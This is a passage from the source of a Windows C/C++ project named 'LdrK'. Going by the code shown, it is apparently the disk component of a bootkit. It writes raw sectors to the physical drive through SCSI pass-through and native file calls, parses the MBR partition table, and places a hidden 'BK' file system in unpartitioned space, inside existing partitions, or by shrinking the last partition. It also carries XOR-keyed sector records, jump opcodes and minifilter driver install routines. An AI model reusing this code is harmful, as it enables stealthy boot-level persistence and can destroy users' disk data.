pServiceName) ; 13 | BOOL DeleteMiniDriver(const char* lpszDriverName); 14 | BOOL StopMiniDriver(const char* lpszDriverName); 15 | BOOL StartMiniDriver(const char* lpszDriverName); 16 | BOOL InstallMiniDriver(const char* lpszDriverName,const char* lpszDriverPath,const char* lpszAltitude); 17 | BOOLEAN MiniFilerLoadDrv(PCHAR pDriverName,PCHAR pDriverPath,PCHAR pAltitude); 18 | 19 | extern HANDLE g_hDevice; 20 | 21 | #endif -------------------------------------------------------------------------------- /LdrK/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | 控制台应用程序:LdrK 项目概述 3 | ======================================================================== 4 | 5 | 应用程序向导已为您创建了此 LdrK 应用程序。 6 | 7 | 本文件概要介绍组成 LdrK 应用程序的 8 | 的每个文件的内容。 9 | 10 | 11 | LdrK.vcproj 12 | 这是使用应用程序向导生成的 VC++ 项目的主项目文件, 13 | 其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。 14 | 15 | LdrK.cpp 16 | 这是主应用程序源文件。 17 | 18 | ///////////////////////////////////////////////////////////////////////////// 19 | 其他标准文件: 20 | 21 | StdAfx.h, StdAfx.cpp 22 | 这些文件用于生成名为 LdrK.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。 23 | 24 | ///////////////////////////////////////////////////////////////////////////// 25 | 其他注释: 26 | 27 | 应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。 28 | 29 | ///////////////////////////////////////////////////////////////////////////// -------------------------------------------------------------------------------- /LdrK/Scsi.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | #include "Scsi.h" 3 | 4 | /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 5 | // Reads or writes specified number of sectors from/to specified buffer using SCSI PATH THROUGH method. 6 | // 7 | static BOOL ScsiIo(PWCHAR pDriveW, // drive name to read/write sectors from/to 8 | PCHAR pBuffer, // buffer to store the data 9 | ULONG Length, // size of the buffer in bytes 10 | ULONG LBASector, // starting LBA sector 11 | ULONG ulCount, // number of sectors to read/write 12 | ULONG ulFlags // variouse operation flags 13 | ) 14 | { 15 | BOOLEAN Ret = FALSE; 16 | HANDLE hDrive; 17 | WINERROR Status; 18 | ULONG ulRead = 0; 19 | ULONG ulLen = sizeof(SCSI_PASS_THROUGH_DIRECT_WITH_BUFFER); 20 | PSCSI_PASS_THROUGH_DIRECT pSpt; 21 | PSCSI_PASS_THROUGH_DIRECT_WITH_BUFFER pSptb; 22 | UCHAR Direction,OpCode,OpCode16; 23 | 24 | if (ulFlags & SCSI_IO_WRITE_SECTOR) 25 | { 26 | Direction = SCSI_IOCTL_DATA_OUT; 27 | OpCode = SCSIOP_WRITE; 28 | OpCode16 = SCSIOP_WRITE16; 29 | } 30 | else 31 | { 32 | ASSERT(ulFlags & SCSI_IO_READ_SECTOR); 33 | Direction = SCSI_IOCTL_DATA_IN; 34 | OpCode = SCSIOP_READ; 35 | OpCode16 = SCSIOP_READ16; 36 | 37 | } // if (Flags & SCSI_IO_READ) 38 | 39 | if (pSpt = (PSCSI_PASS_THROUGH_DIRECT)malloc(ulLen)) 40 | { 41 | memset(pSpt,0,ulLen); 42 | pSptb = (PSCSI_PASS_THROUGH_DIRECT_WITH_BUFFER)pSpt; 43 | hDrive = CreateFile(pDriveW,GENERIC_WRITE | GENERIC_READ,FILE_SHARE_READ | FILE_SHARE_WRITE,0,OPEN_EXISTING,0,0); 44 | if (hDrive != INVALID_HANDLE_VALUE) 45 | { 46 | pSpt->Length = sizeof(SCSI_PASS_THROUGH_DIRECT); 47 | pSpt->PathId = 0; 48 | pSpt->TargetId = 0; 49 | pSpt->Lun = 0; 50 | pSpt->CdbLength = 16; 51 | pSpt->SenseInfoLength = SPTWB_SENSE_LENGTH; 52 | pSpt->DataIn = Direction; 53 | pSpt->DataTransferLength = Length; 54 | pSpt->TimeOutValue = 200; 55 | pSpt->DataBuffer = pBuffer; 56 | pSpt->SenseInfoOffset = (ULONG)((PCHAR)&pSptb->SenseInfoBuffer - (PCHAR)pSptb); 57 | 58 | // Formating CDB16 59 | if (LOBYTE(LOWORD(GetVersion())) > 5) 60 | { 61 | // Vista and highter 62 | pSpt->Cdb16.OperationCode = OpCode16; 63 | } 64 | else 65 | { 66 | // XP and w2k3 67 | pSpt->Cdb16.OperationCode = OpCode; 68 | } 69 | pSpt->Cdb16.ForceUnitAccess = TRUE; 70 | 71 | pSpt->Cdb16.LogicalBlock[0] = HIBYTE(HIWORD(LBASector)); 72 | pSpt->Cdb16.LogicalBlock[1] = LOBYTE(HIWORD(LBASector)); 73 | pSpt->Cdb16.LogicalBlock[2] = HIBYTE(LOWORD(LBASector)); 74 | pSpt->Cdb16.LogicalBlock[3] = LOBYTE(LOWORD(LBASector)); 75 | 76 | pSpt->Cdb16.TransferLength[0] = HIBYTE(HIWORD(ulCount)); 77 | pSpt->Cdb16.TransferLength[1] = LOBYTE(HIWORD(ulCount)); 78 | pSpt->Cdb16.TransferLength[2] = HIBYTE(LOWORD(ulCount)); 79 | pSpt->Cdb16.TransferLength[3] = LOBYTE(LOWORD(ulCount)); 80 | 81 | pSpt->Cdb16.Control = 0x10; 82 | 83 | // Sending SRB block to the device 84 | Status = DeviceIoControl(hDrive,IOCTL_SCSI_PASS_THROUGH_DIRECT,pSpt,ulLen,pSpt,ulLen,&ulRead,NULL); 85 | if ((Status) && ulRead < ulLen) 86 | { 87 | Ret = TRUE; 88 | } 89 | else 90 | { 91 | Status = GetLastError(); 92 | } 93 | CloseHandle(hDrive); 94 | } // if (hDrive != INVALID_HANDLE_VALUE) 95 | free(pSpt); 96 | } 97 | return(Ret); 98 | } 99 | /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 100 | // Reads or writes specified number of sectors from/to specified buffer. 101 | // 102 | static BOOL DirectIo(PWCHAR pDriveW, // drive name to read/write sectors from/to 103 | PCHAR pBuffer, // bufer to store the data 104 | ULONG ulLength, // size of the buffer 105 | ULONG ulLBASector, // starting LBA sector 106 | ULONG ulCount, // number of sectors to read/write 107 | ULONG ulFlags // variouse operation flags 108 | ) 109 | { 110 | BOOLEAN bRet = FALSE; 111 | HANDLE hDrive; 112 | NTSTATUS Status; 113 | OBJECT_ATTRIBUTES ObjectAttributes = {0}; 114 | UNICODE_STRING us; 115 | IO_STATUS_BLOCK IoStatus = {0}; 116 | LARGE_INTEGER lFilePos = {0}; 117 | HANDLE hEvent = CreateEvent(NULL,TRUE,FALSE,NULL); 118 | 119 | RtlInitUnicodeString(&us,pDriveW); 120 | InitializeObjectAttributes(&ObjectAttributes,&us,OBJ_CASE_INSENSITIVE,NULL,NULL); 121 | 122 | if ((ulCount * BIOS_DEFAULT_SECTOR_SIZE) <= ulLength) 123 | { 124 | Status = NtCreateFile(&hDrive, \ 125 | GENERIC_WRITE | GENERIC_READ, \ 126 | &ObjectAttributes, \ 127 | &IoStatus, \ 128 | NULL, \ 129 | FILE_ATTRIBUTE_NORMAL, \ 130 | FILE_SHARE_READ | FILE_SHARE_WRITE, \ 131 | FILE_OPEN, \ 132 | 0, \ 133 | NULL, \ 134 | 0); 135 | if (NT_SUCCESS(Status)) 136 | { 137 | lFilePos.QuadPart = ((ULONGLONG)ulLBASector * BIOS_DEFAULT_SECTOR_SIZE); 138 | 139 | if (ulFlags & SCSI_IO_WRITE_SECTOR) 140 | { 141 | Status = NtWriteFile(hDrive, \ 142 | hEvent, \ 143 | NULL, \ 144 | NULL, \ 145 | &IoStatus, \ 146 | pBuffer, \ 147 | (ulCount * BIOS_DEFAULT_SECTOR_SIZE), \ 148 | &lFilePos, \ 149 | NULL); 150 | } 151 | else 152 | { 153 | Status = NtReadFile(hDrive, \ 154 | hEvent, \ 155 | NULL, \ 156 | NULL, \ 157 | &IoStatus, \ 158 | pBuffer, \ 159 | (ulCount * BIOS_DEFAULT_SECTOR_SIZE), \ 160 | &lFilePos, \ 161 | NULL); 162 | } 163 | if (Status == STATUS_PENDING) 164 | { 165 | WaitForSingleObject(hEvent,INFINITE); 166 | } 167 | NtClose(hDrive); 168 | if (NT_SUCCESS(IoStatus.Status)) 169 | { 170 | bRet = TRUE; 171 | } 172 | } 173 | } 174 | return bRet; 175 | } 176 | 177 | -------------------------------------------------------------------------------- /LdrK/Scsi.h: -------------------------------------------------------------------------------- 1 | #ifndef __SCSI_H__ 2 | #define __SCSI_H__ 3 | 4 | #pragma warning(disable:4996) 5 | 6 | #define FILE_DEVICE_SCSI 0x0000001b 7 | 8 | #define IOCTL_SCSI_EXECUTE_IN ((FILE_DEVICE_SCSI << 16) + 0x0011) 9 | #define IOCTL_SCSI_EXECUTE_OUT ((FILE_DEVICE_SCSI << 16) + 0x0012) 10 | #define IOCTL_SCSI_EXECUTE_NONE ((FILE_DEVICE_SCSI << 16) + 0x0013) 11 | 12 | // 13 | // SMART support in atapi 14 | // 15 | 16 | #define IOCTL_SCSI_BASE FILE_DEVICE_CONTROLLER 17 | 18 | #define IOCTL_SCSI_MINIPORT_SMART_VERSION ((FILE_DEVICE_SCSI << 16) + 0x0500) 19 | #define IOCTL_SCSI_MINIPORT_IDENTIFY ((FILE_DEVICE_SCSI << 16) + 0x0501) 20 | #define IOCTL_SCSI_MINIPORT_READ_SMART_ATTRIBS ((FILE_DEVICE_SCSI << 16) + 0x0502) 21 | #define IOCTL_SCSI_MINIPORT_READ_SMART_THRESHOLDS ((FILE_DEVICE_SCSI << 16) + 0x0503) 22 | #define IOCTL_SCSI_MINIPORT_ENABLE_SMART ((FILE_DEVICE_SCSI << 16) + 0x0504) 23 | #define IOCTL_SCSI_MINIPORT_DISABLE_SMART ((FILE_DEVICE_SCSI << 16) + 0x0505) 24 | #define IOCTL_SCSI_MINIPORT_RETURN_STATUS ((FILE_DEVICE_SCSI << 16) + 0x0506) 25 | #define IOCTL_SCSI_MINIPORT_ENABLE_DISABLE_AUTOSAVE ((FILE_DEVICE_SCSI << 16) + 0x0507) 26 | #define IOCTL_SCSI_MINIPORT_SAVE_ATTRIBUTE_VALUES ((FILE_DEVICE_SCSI << 16) + 0x0508) 27 | #define IOCTL_SCSI_MINIPORT_EXECUTE_OFFLINE_DIAGS ((FILE_DEVICE_SCSI << 16) + 0x0509) 28 | #define IOCTL_SCSI_MINIPORT_ENABLE_DISABLE_AUTO_OFFLINE ((FILE_DEVICE_SCSI << 16) + 0x050a) 29 | #define IOCTL_SCSI_MINIPORT_READ_SMART_LOG ((FILE_DEVICE_SCSI << 16) + 0x050b) 30 | #define IOCTL_SCSI_MINIPORT_WRITE_SMART_LOG ((FILE_DEVICE_SCSI << 16) + 0x050c) 31 | 32 | 33 | #define IOCTL_SCSI_PASS_THROUGH CTL_CODE(IOCTL_SCSI_BASE, 0x0401, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) 34 | #define IOCTL_SCSI_MINIPORT CTL_CODE(IOCTL_SCSI_BASE, 0x0402, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) 35 | #define IOCTL_SCSI_GET_INQUIRY_DATA CTL_CODE(IOCTL_SCSI_BASE, 0x0403, METHOD_BUFFERED, FILE_ANY_ACCESS) 36 | #define IOCTL_SCSI_GET_CAPABILITIES CTL_CODE(IOCTL_SCSI_BASE, 0x0404, METHOD_BUFFERED, FILE_ANY_ACCESS) 37 | #define IOCTL_SCSI_PASS_THROUGH_DIRECT CTL_CODE(IOCTL_SCSI_BASE, 0x0405, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) 38 | #define IOCTL_SCSI_GET_ADDRESS CTL_CODE(IOCTL_SCSI_BASE, 0x0406, METHOD_BUFFERED, FILE_ANY_ACCESS) 39 | #define IOCTL_SCSI_RESCAN_BUS CTL_CODE(IOCTL_SCSI_BASE, 0x0407, METHOD_BUFFERED, FILE_ANY_ACCESS) 40 | #define IOCTL_SCSI_GET_DUMP_POINTERS CTL_CODE(IOCTL_SCSI_BASE, 0x0408, METHOD_BUFFERED, FILE_ANY_ACCESS) 41 | #define IOCTL_SCSI_FREE_DUMP_POINTERS CTL_CODE(IOCTL_SCSI_BASE, 0x0409, METHOD_BUFFERED, FILE_ANY_ACCESS) 42 | #define IOCTL_IDE_PASS_THROUGH CTL_CODE(IOCTL_SCSI_BASE, 0x040a, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) 43 | #define IOCTL_ATA_PASS_THROUGH CTL_CODE(IOCTL_SCSI_BASE, 0x040b, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) 44 | #define IOCTL_ATA_PASS_THROUGH_DIRECT CTL_CODE(IOCTL_SCSI_BASE, 0x040c, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS) 45 | 46 | 47 | 48 | typedef struct _SCSI_BUS_DATA { 49 | UCHAR NumberOfLogicalUnits; 50 | UCHAR InitiatorBusId; 51 | ULONG InquiryDataOffset; 52 | } SCSI_BUS_DATA, *PSCSI_BUS_DATA; 53 | 54 | typedef struct _SCSI_ADAPTER_BUS_INFO { 55 | UCHAR NumberOfBuses; 56 | SCSI_BUS_DATA BusData[1]; 57 | } SCSI_ADAPTER_BUS_INFO, *PSCSI_ADAPTER_BUS_INFO; 58 | 59 | typedef struct _SCSI_INQUIRY_DATA { 60 | UCHAR PathId; 61 | UCHAR TargetId; 62 | UCHAR Lun; 63 | BOOLEAN DeviceClaimed; 64 | ULONG InquiryDataLength; 65 | ULONG NextInquiryDataOffset; 66 | UCHAR InquiryData[1]; 67 | } SCSI_INQUIRY_DATA, *PSCSI_INQUIRY_DATA; 68 | 69 | // 70 | // Standard 10-byte CDB 71 | 72 | typedef struct _CDB10 { 73 | UCHAR OperationCode; 74 | 75 | UCHAR RelativeAddress : 1; 76 | UCHAR Reserved1 : 2; 77 | UCHAR ForceUnitAccess : 1; 78 | UCHAR DisablePageOut : 1; 79 | UCHAR LogicalUnitNumber : 3; 80 | 81 | UCHAR LogicalBlockByte0; 82 | UCHAR LogicalBlockByte1; 83 | UCHAR LogicalBlockByte2; 84 | UCHAR LogicalBlockByte3; 85 | UCHAR Reserved2; 86 | UCHAR TransferBlocksMsb; 87 | UCHAR TransferBlocksLsb; 88 | UCHAR Control; 89 | } CDB10, *PCDB10; 90 | 91 | 92 | typedef struct _CDB16 { 93 | UCHAR OperationCode; 94 | UCHAR Reserved1 : 3; 95 | UCHAR ForceUnitAccess : 1; 96 | UCHAR DisablePageOut : 1; 97 | UCHAR Protection : 3; 98 | UCHAR LogicalBlock[8]; 99 | UCHAR TransferLength[4]; 100 | UCHAR Reserved2; 101 | UCHAR Control; 102 | } CDB16, *PCDB16; 103 | 104 | 105 | struct _READ16 { 106 | UCHAR OperationCode; // 0x88 - SCSIOP_READ16 107 | UCHAR Reserved1 : 3; 108 | UCHAR ForceUnitAccess : 1; 109 | UCHAR DisablePageOut : 1; 110 | UCHAR ReadProtect : 3; 111 | UCHAR LogicalBlock[8]; 112 | UCHAR TransferLength[4]; 113 | UCHAR Reserved2 : 7; 114 | UCHAR Streaming : 1; 115 | UCHAR Control; 116 | } READ16; 117 | 118 | 119 | typedef struct _SCSI_PASS_THROUGH_DIRECT { 120 | USHORT Length; 121 | UCHAR ScsiStatus; 122 | UCHAR PathId; 123 | UCHAR TargetId; 124 | UCHAR Lun; 125 | UCHAR CdbLength; 126 | UCHAR SenseInfoLength; 127 | UCHAR DataIn; 128 | ULONG DataTransferLength; 129 | ULONG TimeOutValue; 130 | PVOID DataBuffer; 131 | ULONG SenseInfoOffset; 132 | union 133 | { 134 | CDB10 Cdb10; 135 | CDB16 Cdb16; 136 | UCHAR Cdb[16]; 137 | 138 | }; 139 | }SCSI_PASS_THROUGH_DIRECT, *PSCSI_PASS_THROUGH_DIRECT; 140 | 141 | 142 | 143 | typedef struct _SCSI_PASS_THROUGH { 144 | USHORT Length; 145 | UCHAR ScsiStatus; 146 | UCHAR PathId; 147 | UCHAR TargetId; 148 | UCHAR Lun; 149 | UCHAR CdbLength; 150 | UCHAR SenseInfoLength; 151 | UCHAR DataIn; 152 | ULONG DataTransferLength; 153 | ULONG TimeOutValue; 154 | ULONG_PTR DataBufferOffset; 155 | ULONG SenseInfoOffset; 156 | UCHAR Cdb[16]; 157 | }SCSI_PASS_THROUGH, *PSCSI_PASS_THROUGH; 158 | 159 | 160 | // 161 | // Structures for SCSI pass through and SCSI pass through direct. 162 | // 163 | // IA64 requires 8-byte alignment for pointers, 164 | // but the IA64 NT kernel expects 16-byte alignment 165 | // 166 | #ifdef _WIN64 167 | #define PTRALIGN DECLSPEC_ALIGN(16) 168 | #else 169 | #define PTRALIGN DECLSPEC_ALIGN(4) 170 | #endif 171 | 172 | #define SPTWB_SENSE_LENGTH 32 173 | #define SPTWB_DATA_LENGTH 512 174 | 175 | typedef struct _SCSI_PASS_THROUGH_WITH_BUFFERS { 176 | SCSI_PASS_THROUGH ScsiPassThrough; 177 | PTRALIGN UCHAR SenseInfoBuffer[SPTWB_SENSE_LENGTH]; 178 | PTRALIGN UCHAR DataBuffer[SPTWB_DATA_LENGTH]; 179 | } SCSI_PASS_THROUGH_WITH_BUFFERS, *PSCSI_PASS_THROUGH_WITH_BUFFERS; 180 | 181 | typedef struct _SCSI_PASS_THROUGH_DIRECT_WITH_BUFFER { 182 | SCSI_PASS_THROUGH_DIRECT ScsiPassThroughDirect; 183 | PTRALIGN UCHAR SenseInfoBuffer[SPTWB_SENSE_LENGTH]; 184 | } SCSI_PASS_THROUGH_DIRECT_WITH_BUFFER, *PSCSI_PASS_THROUGH_DIRECT_WITH_BUFFER; 185 | 186 | 187 | #define SCSI_IOCTL_DATA_OUT 0 188 | #define SCSI_IOCTL_DATA_IN 1 189 | #define SCSI_IOCTL_DATA_UNSPECIFIED 2 190 | 191 | 192 | #define RAW_READ_CMD 0xBE // ATAPI RAW READ 193 | #define WHATS_READ 0xF8 // Sync & All Headers & User Data + EDC/ECC 194 | #define PACKET_LEN 2352 195 | 196 | #define SCSIOP_READ 0x28 197 | #define SCSIOP_WRITE 0x2a 198 | #define SCSIOP_WRITE_DATA_BUFF 0x3B 199 | #define SCSIOP_READ_DATA_BUFF 0x3C 200 | 201 | #define SCSIOP_READ16 0x88 202 | #define SCSIOP_WRITE16 0x8A 203 | 204 | 205 | #pragma pack (push) 206 | #pragma pack (1) 207 | typedef struct _CHSS 208 | { 209 | LARGE_INTEGER StartSector; 210 | USHORT NumberSectors; 211 | ULONG XorValue; 212 | } CHSS, *PCHSS; 213 | #pragma pack (pop) 214 | 215 | 216 | #define BK_NAME_MAGIC (ULONG)0x33333333 217 | #define BK_NAME_LENGTH 200 // bytes 218 | 219 | 220 | 221 | #define OP_JMP_SHORT 0xeb 222 | #define OP_JMP_NEAR 0xe9 223 | 224 | #define PARTITION L"\\Device\\Harddisk0\\Partition%u" 225 | #define PHYSICALDRIVE0 L"\\??\\PHYSICALDRIVE0" 226 | 227 | #define SCSI_IO_READ_SECTOR 1 228 | #define SCSI_IO_WRITE_SECTOR 2 229 | 230 | #define BIOS_DEFAULT_SECTOR_SIZE 0x200 // 512 bytes 231 | #define BIOS_MBR_MAGIC 0xaa55 232 | #define BIOS_PARTITION_TABLE_OFFSET 0x1be 233 | #define BIOS_MAX_PARTITION_COUNT 4 234 | #define BIOS_PARTITION_ACTIVE_FLAG 0x80 235 | #define BIOS_PARTITION_TYPE_INSTALLABLE 7 236 | 237 | BOOL DirectIo(PWCHAR pDriveW, // drive name to read/write sectors from/to 238 | PCHAR pBuffer, // bufer to store the data 239 | ULONG ulLength, // size of the buffer 240 | ULONG ulLBASector, // starting LBA sector 241 | ULONG ulCount, // number of sectors to read/write 242 | ULONG ulFlags // variouse operation flags 243 | ); 244 | BOOL ScsiIo(PWCHAR pDriveW, // drive name to read/write sectors from/to 245 | PCHAR pBuffer, // buffer to store the data 246 | ULONG Length, // size of the buffer in bytes 247 | ULONG LBASector, // starting LBA sector 248 | ULONG ulCount, // number of sectors to read/write 249 | ULONG ulFlags // variouse operation flags 250 | ); 251 | 252 | #endif -------------------------------------------------------------------------------- /LdrK/SectorLib.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | #include "SectorLib.h" 3 | 4 | NTSTATUS _stdcall SectorIo(PUNICODE_STRING pUniDriveName, // drive name to read/write sectors from/to 5 | PCHAR pBuffer, // bufer to store the data 6 | ULONG ulLength, // size of the buffer 7 | ULONGLONG ulStartSector, // starting LBA sector 8 | ULONG ulCount, // number of sectors to read/write 9 | ULONG ulFlags) 10 | { 11 | HANDLE hDrive; 12 | NTSTATUS Status; 13 | OBJECT_ATTRIBUTES ObjectAttributes; 14 | IO_STATUS_BLOCK IoStatus; 15 | LARGE_INTEGER lFilePos; 16 | ULONG ulObjectFlags; 17 | 18 | Status = STATUS_BUFFER_TOO_SMALL; 19 | ulObjectFlags = 0; 20 | lFilePos.QuadPart = 0; 21 | 22 | #ifdef _WIN64 23 | if ((ULONG_PTR)&ulObjectFlags & 0x8000000000000000) 24 | #else 25 | if ((ULONG_PTR)&ulObjectFlags & 0x80000000) 26 | #endif 27 | ulObjectFlags |= OBJ_KERNEL_HANDLE; 28 | 29 | InitializeObjectAttributes(&ObjectAttributes, \ 30 | pUniDriveName, \ 31 | ulObjectFlags, \ 32 | NULL, \ 33 | NULL); 34 | 35 | if ((ulCount * BIOS_DEFAULT_SECTOR_SIZE) <= ulLength) 36 | { 37 | Status = ZwOpenFile(&hDrive, \ 38 | FILE_GENERIC_READ | FILE_GENERIC_WRITE, \ 39 | &ObjectAttributes, \ 40 | &IoStatus, 41 | FILE_SHARE_READ | FILE_SHARE_WRITE, \ 42 | FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT); 43 | if (NT_SUCCESS(Status)) 44 | { 45 | lFilePos.QuadPart = (ulStartSector * BIOS_DEFAULT_SECTOR_SIZE); 46 | 47 | if (ulFlags & BK_IO_WRITE) 48 | { 49 | Status = ZwWriteFile(hDrive, \ 50 | 0, \ 51 | NULL, \ 52 | NULL, \ 53 | &IoStatus, \ 54 | pBuffer, \ 55 | (ulCount * BIOS_DEFAULT_SECTOR_SIZE), \ 56 | &lFilePos, \ 57 | NULL); 58 | } 59 | else 60 | { 61 | Status = ZwReadFile(hDrive, \ 62 | 0, \ 63 | NULL, \ 64 | NULL, \ 65 | &IoStatus, \ 66 | pBuffer, \ 67 | (ulCount * BIOS_DEFAULT_SECTOR_SIZE), \ 68 | &lFilePos, \ 69 | NULL); 70 | } 71 | ZwClose(hDrive); 72 | } 73 | } 74 | return Status; 75 | } 76 | NTSTATUS _stdcall GetDriveGeometry(PUNICODE_STRING pUniDriveName,PVOID pDriveGeo) 77 | { 78 | NTSTATUS Status; 79 | HANDLE hDevice; 80 | OBJECT_ATTRIBUTES ObjectAttributes; 81 | IO_STATUS_BLOCK IoStatus; 82 | PDISK_GEOMETRY pDiskGeometry = (PDISK_GEOMETRY)pDriveGeo; 83 | 84 | InitializeObjectAttributes(&ObjectAttributes, \ 85 | pUniDriveName, \ 86 | OBJ_CASE_INSENSITIVE, \ 87 | NULL, \ 88 | NULL); 89 | Status = ZwCreateFile(&hDevice, \ 90 | GENERIC_READ | SYNCHRONIZE, \ 91 | &ObjectAttributes, \ 92 | &IoStatus, \ 93 | NULL, \ 94 | 0, \ 95 | FILE_SHARE_READ | FILE_SHARE_WRITE, \ 96 | FILE_OPEN, \ 97 | FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT, \ 98 | NULL, \ 99 | 0); 100 | if (NT_SUCCESS(Status)) 101 | { 102 | Status = ZwDeviceIoControlFile(hDevice, \ 103 | 0, \ 104 | NULL, \ 105 | NULL, \ 106 | &IoStatus, \ 107 | IOCTL_DISK_GET_DRIVE_GEOMETRY, \ 108 | NULL, \ 109 | 0, \ 110 | pDiskGeometry, \ 111 | sizeof(DISK_GEOMETRY)); 112 | ZwClose(hDevice); 113 | } 114 | return Status; 115 | } 116 | // 117 | // Searches for the boot sector and calculates where to place VFS area. 118 | // 119 | static VOID CalculateFsArea(PDISK_GEOMETRY pDiskGeo,PPARTITION_TABLE PTable,PBK_FS_AREA pFsArea) 120 | { 121 | ULONG uli,ulStartSector = 0,ulEndSector = 0,ulNonNtFirst = 0,ulNonNtSize = 0; 122 | 123 | // Calculating drive unpartitioned space size 124 | for (uli = 0;uli < BIOS_MAX_PARTITION_COUNT;uli++) 125 | { 126 | if (PTable->Entry[uli].Descriptor) 127 | { 128 | if (ulStartSector == 0 || ulStartSector > PTable->Entry[uli].LBAStartSector) 129 | { 130 | ulStartSector = PTable->Entry[uli].LBAStartSector; 131 | } 132 | if (ulEndSector < (PTable->Entry[uli].LBAStartSector + PTable->Entry[uli].PartitionSize)) 133 | { 134 | ulEndSector = (PTable->Entry[uli].LBAStartSector + PTable->Entry[uli].PartitionSize); 135 | } 136 | } // if (PTable->Entry[i].Descriptor) 137 | 138 | if (PTable->Entry[uli].Descriptor == BIOS_PARTITION_TYPE_INSTALLABLE) 139 | { 140 | // This is a NTFS partition 141 | if (PTable->Entry[uli].ActiveFlag & BIOS_PARTITION_ACTIVE_FLAG) 142 | // This an active partition, storing it's start sector 143 | pFsArea->BootSector = (ULONGLONG)PTable->Entry[uli].LBAStartSector; 144 | } 145 | else 146 | { 147 | if (PTable->Entry[uli].Descriptor != 0) 148 | { 149 | // This is an existing non-NTFS partition 150 | ulNonNtFirst = PTable->Entry[uli].LBAStartSector; 151 | ulNonNtSize = PTable->Entry[uli].PartitionSize; 152 | } 153 | } 154 | } // for (i=0; i BK_FS_SIZE_MIN) 156 | { 157 | // There is a space for VFS before the first partition 158 | pFsArea->StartSector = 1; 159 | pFsArea->NumberOfSectors = ulStartSector - 1; 160 | } 161 | else // if (StartSector > BK_FS_SIZE_MIN) 162 | { 163 | ULONG LastSector = (pDiskGeo->Cylinders.LowPart * pDiskGeo->TracksPerCylinder * pDiskGeo->SectorsPerTrack); 164 | // LastSectior value can be smaller then EndSector (bacause of alingment?). 165 | // In this case using LastSectior as the end of the partitioned space. 166 | if ((LastSector > ulEndSector) && ((LastSector - ulEndSector) > BK_FS_SIZE_MIN)) 167 | { 168 | // There is a space for VFS after the last partition 169 | pFsArea->StartSector = (ULONGLONG)(ulEndSector + 1); 170 | pFsArea->NumberOfSectors = LastSector - ulEndSector - 1; 171 | } 172 | else 173 | { 174 | if (ulNonNtSize >= BK_FS_SIZE_MIN) 175 | { 176 | // Using a part of an existing non-NTFS partition to store the VFS 177 | pFsArea->StartSector = (ULONGLONG)ulNonNtFirst + ulNonNtSize - BK_FS_SIZE_MIN; 178 | } 179 | else 180 | { 181 | // Trying to reduce last partition size to fit the VFS 182 | pFsArea->StartSector = (ULONGLONG)LastSector - BK_FS_SIZE_MIN; 183 | } 184 | pFsArea->NumberOfSectors = BK_FS_SIZE_MIN; 185 | } 186 | } // else // if (StartSector > BK_FS_SIZE_MIN) 187 | pFsArea->BytesPerSector = pDiskGeo->BytesPerSector; 188 | } 189 | 190 | 191 | // 192 | // Searches for and allocates space for BK file system partition. 193 | // Fills BK_FS_AREA structure with partition start sector and sizes. 194 | // 195 | NTSTATUS BkAllocateFsArea(PBK_FS_AREA pFsArea,PVOID WorkBuffer) 196 | { 197 | 198 | NTSTATUS Status; 199 | PCHAR pSector = (PCHAR)WorkBuffer; 200 | DISK_GEOMETRY pDiskGeo; 201 | ULONGLONG LStartSector = 0; 202 | PPARTITION_TABLE PTable; 203 | 204 | do 205 | { 206 | if (!(NT_SUCCESS(Status = GetDriveGeometry(pFsArea->pDeviceName,&pDiskGeo)))) 207 | { 208 | break; 209 | } 210 | if (pDiskGeo.BytesPerSector != BIOS_DEFAULT_SECTOR_SIZE) 211 | { 212 | // Unsupported sector size 213 | Status = STATUS_BAD_DEVICE_TYPE; 214 | break; 215 | } 216 | // Reading MBR sector 217 | if (!(NT_SUCCESS(Status = BkReadSectors(pFsArea->pDeviceName,pSector,BIOS_DEFAULT_SECTOR_SIZE,LStartSector,1)))) 218 | { 219 | // Reading failed 220 | break; 221 | } 222 | // Check out we read a right one 223 | if (*(PUSHORT)(pSector + BIOS_DEFAULT_SECTOR_SIZE - sizeof(USHORT)) != BIOS_MBR_MAGIC) 224 | { 225 | // Wrong or corrupt sector loaded 226 | Status = STATUS_BAD_DEVICE_TYPE; 227 | break; 228 | } 229 | // We have read the Disk Boot sector and now analyzing it's partition table 230 | PTable = (PPARTITION_TABLE)(pSector + BIOS_PARTITION_TABLE_OFFSET); 231 | CalculateFsArea(&pDiskGeo,PTable,pFsArea); 232 | } while(FALSE); 233 | return Status; 234 | } 235 | -------------------------------------------------------------------------------- /LdrK/SectorLib.h: -------------------------------------------------------------------------------- 1 | #ifndef __SECTOR_LIB_H__ 2 | #define __SECTOR_LIB_H__ 3 | 4 | 5 | 6 | 7 | #define NTFS_OEM_ID "NTFS " 8 | #define NTFS_LOADER_SIZE 16 // sectors 9 | #define NTFS_LDR_HEADER_SIZE 0x20 // bytes 10 | 11 | #define BK_IO_READ 1 12 | #define BK_IO_WRITE 2 13 | 14 | 15 | // BIOS structures 16 | typedef struct _PARTITION_TABLE_ENTRY 17 | { 18 | ULONG ActiveFlag : 8; 19 | ULONG CHSStartSector : 24; 20 | ULONG Descriptor : 8; 21 | ULONG CHSEndSector : 24; 22 | ULONG LBAStartSector; 23 | ULONG PartitionSize; 24 | }PARTITION_TABLE_ENTRY, *PPARTITION_TABLE_ENTRY; 25 | 26 | 27 | typedef struct _PARTITION_TABLE 28 | { 29 | PARTITION_TABLE_ENTRY Entry[BIOS_MAX_PARTITION_COUNT]; 30 | 